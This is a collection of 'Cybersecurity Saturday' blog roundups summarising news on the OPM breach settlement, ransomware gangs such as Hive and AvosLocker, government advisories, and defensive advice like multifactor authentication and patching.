A $63 million settlement has been reached in the class-action lawsuit filed over the 2015 data breach of the US Office of Personnel Management (OPM) that exposed the data of over 21 million current, former, and prospective federal employees and families members, the Epoch Times reports. The files were allegedly stolen by China-backed hackers, who exfiltrated highly sensitive information such as fingerprints and psychological and emotional health histories, and it is reported that the Chinese government has been using data from such breaches to build a database on American citizens for political and economic espionage. The agreement explains, “The settlement is the result of extensive negotiations and accounts for the unique aspects of this litigation, including the strict limitation on recovering from the Government and the causation problems that Defendants would have argued result from the hack’s attribution to a foreign state actor…That these data breaches were attributed to the Chinese government, apparently motivated by foreign policy considerations, would have compounded the risks associated with tracing plaintiffs’ harm to [OPM].” Under the settlement, which is still awaiting approval from a federal judge, OPM will pay $60 million and OPM contractor Peraton will pay $3 million into a fund for victims of the hack. 

The news strikes the FEHBlog as a good deal for the government.

From the ransomware front, Cyberscoop informs us

AvosLocker, a prolific ransomware group that was the subject of a recent joint FBI and U.S. Treasury Department warning, claimed this week that it had hit a Dallas-based nonprofit Catholic health system with more than 600 facilities across four U.S. states, Mexico, Chile and Colombia.

The attack on CHRISTUS Health marks the second health care system AvosLocker targeted in the last two months. Michigan-based McKenzie Health System began notifying customers this week that patients’ personal data had been stolen from the company’s network in a “security incident” that “disrupted” some of its IT systems in March. The company did not identify the attacker, but AvosLocker posted purported McKenzie data to its dark web leak site April 6. * * *

Security Week adds

Over the past several months, Iran-linked cyberespionage group Charming Kitten has been engaging in financially-motivated activities, the Secureworks Counter Threat Unit (CTU) reports.

Also referred to as APT35, Magic Hound, NewsBeef, Newscaster, Phosphorus, and TA453, the advanced persistent threat (APT) actor is known for the targeting of activists, government organizations, journalists, and various other entities. * * *

The security researchers assess that, while the group has managed to compromise a large number of targets worldwide, “their ability to capitalize on that access for financial gain or intelligence collection appears limited.” However, the use of publicly available tools for ransomware operations shows that the group remains an ongoing threat, Secureworks concludes.

For more on Charming Kitten, check out this Cyberscoop article.

Here is a link to the Bleeping Computer’s Week in Ransomware column.

From the cyber vulnerabilities front, CISA added one new known vulnerability to its catalog.

From the cyber defenses front, here’s a link to a press release of note

The Cybersecurity and Infrastructure Security Agency (CISA), in partnership with the United Kingdom’s National Cyber Security Centre (NCSC-UK), Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), New Zealand National Cyber Security Centre (NZ NCSC), National Security Agency (NSA), and Federal Bureau of Investigation (FBI) released an advisory today [May 11] with cybersecurity best practices for information and communications technology (ICT), focusing on enabling transparent discussions between managed service providers (MSPs) and their customers on securing sensitive data. CISA, NCSC-UK, ACSC, CCCS, NZ-NCSC, NSA, and FBI expect state-sponsored advanced persistent threat (APT) groups and other malicious cyber actors to increase their targeting of MSPs against both provider and customer networks. 

Security Week offers an expert view on seven steps to reduce risk to your critical infrastructure quickly.

Cybersecurity Saturday

From the ransomware front

The HHS Cybersecurity Program released a PowerPoint presentation on ransomware trends in the first quarter of this year.

Here’s a link to Bleeping Computers’ The Week in Ransomware.

Ransomware operations continue to evolve, with new groups appearing and others quietly shutting down their operations or rebranding as new groups. * * * [For example,] the notorious REvil ransomware operation has returned amidst rising tensions between Russia and the USA, with new infrastructure and a modified encryptor allowing for more targeted attacks.

Bleeping Computer adds

The US Department of State is offering up to $15 million for information that helps identify and locate leadership and co-conspirators of the infamous Conti ransomware gang.

Up to $10 million of this reward is offered for info on Conti leaders’ identity and location, and an additional $5 million for information leading to the arrest and/or convictions of individuals who conspired or attempted to participate in Conti ransomware attacks.

From the vulnerabilities front

  • The HHS Cybersecurity Program issued a bulletin on “April Vulnerabilities of Interest to the Health Sector”

The FBI has warned that business email compromise (BEC) fraud cost businesses around the world $43 billion in losses during the period between June 2016 and December 2021. The FBI’s Internet Crime Center (IC3) logged a whopping 241,206 complaints in the four-and-a-half-year period, with losses totaling $43 billion, according to a new public service announcement.

From the cyberdefenses front, CISA “is beginning a month-long mission to rock the message that multifactor authentication keeps you more secure! So, join us for MFA May!” Throughout the month of May:

Follow CISA on Twitter, Facebook, LinkedIn, and Instagram for rocking content all month on MFA.

Tell us on social media that your business or personal devices are now protected by MFA with the hashtag #EnableMFA!  We’ll do our best to Pour Some Sugar on your posts!

And since we all get by With A Little Help from Our Friends, challenge your friends, family, co-workers, and fellow rockers to #EnableMFA too.

For What it’s Worth, you can always learn more about multi-factor authentication at https://www.cisa.gov/mfa

Cybersecurity Saturday

From the ransomware front, Cybersecurity Dive reports

The prevalence and scope of ransomware exploded in 2021, as two-thirds of mid-sized organizations worldwide were targets and average ransom payouts saw a five-fold increase, according to the State of Ransomware 2022 report from Sophos released Wednesday. 

Ransomware hit 66% of mid-sized organizations last year, up from 37% in 2020. Average ransom payments reached $812,000 during 2021, compared with $170,000 the prior year.  

Among organizations with encrypted data, 46% paid a ransom to adversaries. In addition, 26% of organizations who were able to restore data from backups still decided to pay a ransom.

To make matters even worse, Security Week informs us

As part of a recent cyberattack, threat actors deployed ransomware less than four hours after compromising the victim’s environment, according to researchers with The DFIR Report.

The attack started with an IcedID payload being deployed on a user endpoint and led to the execution of Quantum ransomware only three hours and 44 minutes later. DFIR Report researchers described it as one of the fastest ransomware attacks they have observed to date.

In a Ryuk ransomware attack in October 2020, the threat actors started encrypting the victim’s data only 29 hours after the initial breach, but the median global dwell time for ransomware is roughly 5 days, according to Mandiant’s M-Trends 2022 report.

Once the ransomware has been executed, however, the victim’s data may be encrypted within minutes. A recent report from Splunk shows that ransomware needs an average of 43 minutes to encrypt data, while the fastest encryption time is less than 6 minutes.

ZDNet describes how a single failure to patch a vulnerability opened the door to ransomware hackers. The article emphasizes the importance of basic cybersecurity hygiene advice:

“The biggest lesson here is patch the network infrastructure – whatever is facing the internet, it’s always important for it to be fully patched,” said Daniel dos Santos, head of security research at Forescout.

It’s also recommended that organisations monitor their networks for external access from known IP addresses or unusual patterns of behavior. In addition, businesses should back up their servers regularly. Then, if something happens, the network can be restored to a recent point without needing to pay a ransom.

Perhaps then it is not surprising that a Security Week expert advises “it is important to increase an organization’s ransomware preparedness and assure that the tools needed for remediation, eradication, and recovery are not just in place but also functioning as expected. This is especially true for the recovery of endpoints, which represent an essential tool for remote workers to conduct their assigned business tasks in today’s work-from-anywhere environment.” 

As always and it may be every other week now, here is a link to Bleeping Computer’s The Week in Ransomware.

From the vulnerabilities front, HHS Cybersecurity Program released

  • a report on 2021’s top exploited vulnerabilities
  • a warning about BlackCat/ALPHV Ransomware Indicators of Compromise, and
  • an international joint cybersecurity advisory on Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure.

CISA added “seven new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.”

Health IT Security notes

Mandiant Threat Intelligence observed a record number of zero-day exploits in 2021, its latest report revealed. The firm identified 80 exploited zero-days in 2021, compared to just 30 in 2020. Threat actors favored zero-days in Google, Microsoft, and Apple products most frequently, largely exhibiting the popularity of those vendors.

The term “zero-day” indicates that there is no time between when a vulnerability is discovered by developers and when it is exploited by bad actors.

From the cyberdefenses front —

  • Healthcare Dive discusses what cyber insurance companies expect from their policyholders.
  • Federal News Network provides insights into achieving zero trust requirements.
  • ISACA explains what you need to know about malicious cybertrends.

Cybersecurity Saturday

The Wall Street Journal recently interviewed IBM’s CEO Arvind Krishna. The interview concludes as follows:

WSJ: What is the biggest challenge facing the CIO and enterprise technology going forward?

Mr. Krishna: Cybersecurity is the issue of the decade. I think that is the single biggest issue we all are going to face. You have to take an enterprise approach, layered defenses. You have got to encrypt your data. You have got to worry about access control. You have got to believe you will get broken into. You make sure that you can recover really quickly, especially when it comes to critical systems.

Well put.

The Cybersecurity and Infrastructure Security Agency informs us

The Federal Bureau of Investigation (FBI) has released a Flash report detailing indicators of compromise (IOCs) associated with attacks involving BlackCat/ALPHV, a Ransomware-as-a-Service that has compromised at least 60 entities worldwide.

CISA encourages users and administrators to review the IOCs and technical details in FBI Flash CU-000167-MW and apply the recommended mitigations. 

Security Week and Bleeping Computer expand on this FBI alert for those interested.

CISA also added three known exploited vulnerabilities to its catalog.

In other vulnerability news, Cyberscoop tells us

More than 450 security researchers working through the Department of Homeland Security’s “Hack the DHS” bug bounty program identified more than 122 vulnerabilities, 27 of which were deemed critical, according to a DHS statement first obtained by CyberScoop.

The agency awarded $125,600 to participants in the program for finding and identifying the vulnerabilities, the agency said in the statement. The researchers, vetted by the agency before participating, were eligible to receive between $500 and $5,000 for verified vulnerabilities, depending on the severity. * * *

Friday’s results represent the first phase of the DHS bug bounty program. The second phase will consist of a live, in-person hacking event, while the third will identify lessons learned to inform future bug bounty programs.

Cybersecurity Dive reports

Amazon Web Services is scrambling to assist customers after security researchers at Palo Alto Networks found severe vulnerabilities in AWS hotpatches that were supposed to protect customers from the Log4Shell vulnerability. 

AWS released a software tool in mid-December designed to patch vulnerabilities found in the Log4j library, however security researchers at Palo Alto’s Unit 42 discovered code vulnerabilities that could let attackers break out of a container environment and gain escalated privileges. 

After working with Palo Alto researchers for months, Amazon released a new hotpatch earlier this week, Unit 42 said in research released Tuesday. Unit 42 researcher Yuval Avrahami is urging organizations to review their container environments and upgrade to the fixed version. A large number of users may have downloaded the original hotpatches. 

The HHS Health Sector Cybersecurity Coordination Center (HC3) released a comprehensive PowerPoint presentation about insider threats in healthcare.

From the ransomware front, HC3 issued an alert on Hive ransomware.

Hive is an exceptionally aggressive, financially-motivated ransomware group known to maintain sophisticated capabilities who have historically targeted healthcare organizations frequently. HC3 recommends the Healthcare and Public Health (HPH) Sector be aware of their operations and apply appropriate cybersecurity principles and practices found in this document in defending their infrastructure and data against compromise.

Beckers Health IT Issues explains

Here are four things to know about the cyber group, according to the warning:

1. The group uses many common ransomware tactics, including the exploit of remote desktop protocol or VPN, and phishing attacks, in addition to more aggressive methods like directly calling the victims to apply pressure and negotiate ransom payments.

2. Other tactics deployed by the group include searching the victim’s systems that are tied to backups and either terminating or disrupting those connections, deleting shadow copies, backup files and even system snapshots.

3. Hive also conducts double extortion and supports this with their data leaks site, while operating as a ransomware-as-a-service model.

In total, Hive has claimed attacks on approximately 355 companies within 100 days of operations.

HHS is urging healthcare organizations to increase their preventive security measures, such as two-factor authentication, strong passwords, sufficient backups of the most critical data and continuous monitoring.

Speaking of passwords, Cybersecurity Dive discusses the efforts of the FIDO Alliance to gain industry acceptance of using smartphones as the IT authentication standard while the tech industry presses for new methods.